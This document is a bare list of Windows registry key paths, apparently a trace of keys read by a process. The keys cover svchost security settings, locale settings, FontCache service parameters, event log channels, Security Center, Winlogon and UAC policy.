HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityParam
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\ImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationCapabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityAppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DeferredCoInitializeSecurityServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\SystemCritical
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\svchost.exe
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_CURRENT_USER\Control Panel\International\sCountry
HKEY_CURRENT_USER\Control Panel\International\sList
HKEY_CURRENT_USER\Control Panel\International\sDecimal
HKEY_CURRENT_USER\Control Panel\International\sThousand
HKEY_CURRENT_USER\Control Panel\International\sGrouping
HKEY_CURRENT_USER\Control Panel\International\sNativeDigits
HKEY_CURRENT_USER\Control Panel\International\sCurrency
HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep
HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep
HKEY_CURRENT_USER\Control Panel\International\sMonGrouping
HKEY_CURRENT_USER\Control Panel\International\sPositiveSign
HKEY_CURRENT_USER\Control Panel\International\sNegativeSign
HKEY_CURRENT_USER\Control Panel\International\sTimeFormat
HKEY_CURRENT_USER\Control Panel\International\sShortTime
HKEY_CURRENT_USER\Control Panel\International\s1159
HKEY_CURRENT_USER\Control Panel\International\s2359
HKEY_CURRENT_USER\Control Panel\International\sShortDate
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\Control Panel\International\sLongDate
HKEY_CURRENT_USER\Control Panel\International\iCountry
HKEY_CURRENT_USER\Control Panel\International\iMeasure
HKEY_CURRENT_USER\Control Panel\International\iPaperSize
HKEY_CURRENT_USER\Control Panel\International\iDigits
HKEY_CURRENT_USER\Control Panel\International\iLZero
HKEY_CURRENT_USER\Control Panel\International\iNegNumber
HKEY_CURRENT_USER\Control Panel\International\NumShape
HKEY_CURRENT_USER\Control Panel\International\iCurrDigits
HKEY_CURRENT_USER\Control Panel\International\iCurrency
HKEY_CURRENT_USER\Control Panel\International\iNegCurr
HKEY_CURRENT_USER\Control Panel\International\iCalendarType
HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek
HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceMain
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialSystemCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumSystemCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialUserCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumUserCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\system\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Reliability
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability\TimeStampInterval
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-WindowsUpdateClient/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-NetworkAccessProtection/WHC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ChannelAccess
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-Windows Defender/WHC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC\ChannelAccess
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-Diagnosis-Scheduled/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnosis-Scheduled/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\cval
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\eventlog\Application\SecurityCenter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\Application\SecurityCenter\ProviderGuid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-ReliabilityAnalysisComponent/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ChannelAccess
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-Known Folders API Service
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Type
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\FileMax
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\FileCounter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MinBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MaxBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Latency
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\ClockType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\SidType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\ControlGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MaxSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\MaxSizeUpper
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Retention
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\FilterId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\Isolation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\OwningPublisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Known Folders API Service\ChannelAccess
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\eventlog\System\DCOM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\DCOM\ProviderGuid
